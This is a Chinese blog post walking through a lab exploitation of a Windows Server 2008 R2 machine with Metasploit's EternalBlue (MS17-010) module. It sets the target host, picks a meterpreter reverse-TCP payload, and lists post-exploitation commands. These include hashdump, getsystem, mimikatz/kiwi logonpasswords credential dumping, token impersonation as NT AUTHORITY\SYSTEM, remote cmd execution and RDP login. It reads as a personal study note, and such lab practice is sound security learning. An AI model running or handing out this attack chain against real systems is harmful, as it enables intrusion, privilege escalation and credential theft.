【漏洞工具】Metasploit框架永恒之蓝

MSF - 永恒之蓝ms17漏洞利用

  • *环境:windows server 2008 R2 *

  • 第一步、搜索ms17-010的漏洞辅助扫描工具

    • image-20210618082235168
  • 第二步、use该辅助模块

    • image-20210618082325376
  • 第三步、设置攻击参数,Rhost这是攻击主机的ip地址,永恒之蓝就是攻击445端口

    • image-20210618082527325
    • image-20210618082600801
  • 第四步、搜索exploit关于ms17-010,然后找到永恒之蓝

    • image-20210618082739059
    • image-20210618082904198
  • 第五步、找payload,windows反连payload 也就是windows/meterpreter/reverse_tcp

    • image-20210618083429422
    • image-20210618083601528
    • 第一次尝试,虚拟机挂了

    • image-20210618130220362
    • image-20210618085119005
    • 第二次尝试成功

    • image-20210618115140048
  • 建议会话之后的命令使用

    • getlwd – 显示本地工作目录

      • image-20210618200541943
    • ipconfig –显示网络接口信息

      • image-20210618200657205
    • ps –列出正在运行的程序

      • image-20210618200717296
    • migrate – 根据ps查看的pid可以任意迁移平行权限和下行权限

      • image-20210618200829834
      • image-20210618200937038
      • sysinfo –获取远程系统有关信息
        • image-20210618201053573
      • 提权和密码命令
        • getsystem(尝试简单提权)
          • image-20210618201334096
        • hashdump(获取hash密码)
          • image-20210618201408765
      • screenshot (获取远程桌面图片)
        • image-20210618201723492
        • image-20210618201749166
    • shell(感觉比较实用的一个了)

      • image-20210618201834813
      • image-20210618201936506
  • mimikatz(被换了个名字kiwi)抓取管理员账号和密码方式

    • load -l (查看可用模块)

      • image-20210618202215220
    • image-20210618202236991

    • 使用命令(kiwi_cmd sekurlsa::logonpasswords)

      • image-20210618202635214
      • image-20210618202739496
  • 远程CMD命令执行

    • execute -f cmd -c
    • image-20210619165901762
    • image-20210619165918970
  • 木马模式调到后台执行

    • background

  • 木马调回前台

    • session -l

      • image-20210619170225259
  • 令牌操纵

  • use incognito #heip incognito 查看帮助

  • image-20210619170849281

  • list_tokens -u 查看可用的token

  • image-20210619170901610

  • impersonate_token “伪造的身份” #假冒token 或者

  • 举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用\

  • execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell

    • image-20210619171137897
  • 登陆靶机电脑

    1
    rdesktop -u 用户名 -p 密码 登陆ip地址
  • image-20210619171255577
  • image-20210619171334541

本文标题:【漏洞工具】Metasploit框架永恒之蓝

文章作者:孤桜懶契

发布时间:2021年06月18日 - 19:44:31

最后更新:2022年05月20日 - 11:47:45

原始链接:https://gylq.gitee.io/posts/58.html

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

-------------------本文结束 感谢您的阅读-------------------